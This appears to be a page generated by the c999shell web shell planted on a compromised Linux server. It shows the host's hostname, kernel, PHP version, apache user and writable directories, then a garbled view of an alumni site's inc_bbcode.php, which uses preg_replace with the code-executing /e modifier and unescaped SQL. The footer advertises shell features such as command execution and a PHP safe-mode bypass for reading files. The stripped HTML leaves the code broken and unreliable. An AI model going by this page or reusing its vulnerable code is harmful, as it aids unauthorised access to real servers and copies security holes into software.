Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/alumni/inc/ drwxrwxrwx |
Viewing file: inc_bbcode.php (11.76 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | (GPLv2) or write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA02110-1301, USA. ********************************************************************************/ if (stristr(htmlentities($_SERVER['PHP_SELF']), 'inc_bbcode.php')) { die("
\1 ',
'\1 ',
'\1 ',
''
);
//===========================================
//IMG
//===========================================
$max_width = 400;
$max_height = 400;
preg_match_all("`\[img\](.+?)\[/img\]`is",$string,$outstr,PREG_SET_ORDER);
foreach($outstr as $image) {
$info = @getimagesize($image[1]);
if($info[0]>$max_width OR $info[1]>$max_height) {
$string = str_replace($image[0],' Image resized (Original file: '.$info[0].'x'.$info[1].') ', $string);
} else {
$string = str_replace($image[0],'',$string);
}
}
//===========================================
//CODE
//===========================================
//Extract [code]...[/code]
preg_match_all('`\[code\](.+?)\[/code\]`is',$string,$outstr,PREG_PATTERN_ORDER);
$numcodes = count($outstr[0]);
$string_cleaned = $string;
for ($a=0;$a<=$numcodes;$a++) {
$string_cleaned = preg_replace('`\[code\](.+?)\[/code\]`is','___CODE_'.$a.'___',$string_cleaned,1);
}
//Convert BBCode
$string_cleaned = nl2br(preg_replace($patterns,$replaces,$string_cleaned));
$string_cleaned = urlToLink($string_cleaned);
//Break long links
//$string_cleaned = preg_replace('#\(.+?)\#ise',"''.stripslashes(breakLongLinks('\$2')).''",$string_cleaned);
//Restore [code]...[/code]
$string = $string_cleaned;
for ($a=0;$a<$numcodes;$a++) {
$outstr[1][$a] = str_replace("'","'",$outstr[1][$a]);
$string = preg_replace('#(___CODE_)('.$a.')(___)#ise',"'
";
$result = $dblink->get_list("SELECT * FROM memht_smiles LIMIT $totnum");
foreach ($result as $row) {
$sbtitle = outCode($row['title']);
$sbimg = outCode($row['img']);
$sbcode = outCode($row['code']);
$sbcontent .= "\n";
}
$sbcontent .= "\n";
$sbcontent .= " \n";
echo $sbcontent;
}
function bbcodeToolbar($form,$element,$style="public") {
$content = "";
switch ($style) {
case "mini":
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
break;
case "public":
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
$content .= "";
break;
}
echo $content;
}
?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]-- |